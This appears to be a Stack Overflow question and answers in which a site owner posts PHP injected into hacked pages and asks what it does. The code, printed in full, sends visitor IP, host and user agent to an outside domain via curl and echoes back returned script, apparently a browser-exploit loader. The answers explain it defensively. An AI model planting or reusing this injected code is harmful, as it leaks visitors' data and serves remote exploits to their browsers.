7

Recently a website I have been involved with was hacked with unauthorised code being placed on a number of pages. I was just wondering if anyone could shed any light onto what exactly this code does, and what benefit it would be to the user who placed it on these pages.

<?php
#31e3cd#
error_reporting(0); ini_set('display_errors',0); $wp_okpbo35639 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_okpbo35639) && !preg_match ('/bot/i', $wp_okpbo35639))){
$wp_okpbo0935639="http://"."html"."-href".".com/href"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_okpbo35639);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_okpbo0935639);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_35639okpbo =   curl_exec ($ch); curl_close($ch);}
if ( substr($wp_35639okpbo,1,3) === 'scr' ){ echo $wp_35639okpbo; }
#/31e3cd#
?>

Above is the code, as it appeared on the pages. I have played around with this code and it seems to get user information using:

$_SERVER['HTTP_USER_AGENT']

It is then combined into a url similar to the one below, but with the user information from above added to the url

http://html-href.com/href/?ip=::1&referer=localhost&ua=

I know curl is used in the transfer of data but where exactly is this information getting sent and what is its purpose?

Sam
  • 7,252
  • 16
  • 46
  • 65
Tom smith
  • 670
  • 2
  • 15
  • 31

2 Answers2

7

The code makes a call to the URL you noted, sending along the user's IP, your site's domain, and the user's useragent string. It's then printing onto your site any code it receives from the cURL request. The code received could be anything. It could be HTML, JavaScript, or any other client side code. It's probably not server-side code since there's no eval() running the code received.

It appears to target Internet Explorer, Chrome, and FireFox browsers, but not crawlers/bots.

EDIT: As FDL pointed out in his comment, this appears to be printing only if it receives a string where the second, third, and fourth characters are scr, meaning it likely only prints to the page if it received a <script> tag.

Community
  • 1
  • 1
Crashspeeder
  • 4,291
  • 2
  • 16
  • 21
  • 4
    It's likely to be JS, since it's checking for substring of `scr` as the 2nd 3rd and 4th characters (which would match ` – naththedeveloper Jan 07 '14 at 15:19
  • Good call. I hadn't thought of 'script' (I'm terrible at word games!). As a result it appears to only be printing the resulting string if it's JavaScript. – Crashspeeder Jan 07 '14 at 15:21
  • Is the returned content likely to cause damage to a users machine? Is it just returning a string or could the returned content be executed, perhaps to exploit a vulnerability in one of these browsers? – Tom smith Jan 07 '14 at 15:24
  • The returned content is likely to be an exploit targeted at FireFox or Internet Explorer. The string returned is only printed if it contains a ` – Crashspeeder Jan 07 '14 at 15:27
  • @RobertRozas you're right. Chrome's UA string contains "Like Gecko" in it. – Crashspeeder Jan 07 '14 at 15:29
  • Thanks for the replies, I think i have a better idea of what this code is doing now. We have the IP address of the user who accessed the site via FTP, its a location in Spain but I don't know if there is anything we can do with this information. – Tom smith Jan 07 '14 at 15:59
  • The best thing you can do is look into ways to better secure your server (maybe post on ServerFault?). It's my understanding that FTP is insecure and SFTP/SCP are better alternatives. No need to thank us. The best way you can show gratitude is by voting for questions/answers on SO and accepting the best answer to your questions. – Crashspeeder Jan 07 '14 at 16:02
1

$_SERVER['HTTP_USER_AGENT'] is used to check the kind of web browser (or can be a crawler) from which the client requests the resource based on the URL. For instance with this snippet preg_match ('/Gecko|MSIE/i', $wp_okpbo35639), it is used to check if the client browser is Firefox(Gecko) or IE(MSIE). But this is not a foolproof way to determine the source browser as user-agents can easily be changed or switched.

Justin Paul Paño
  • 936
  • 5
  • 7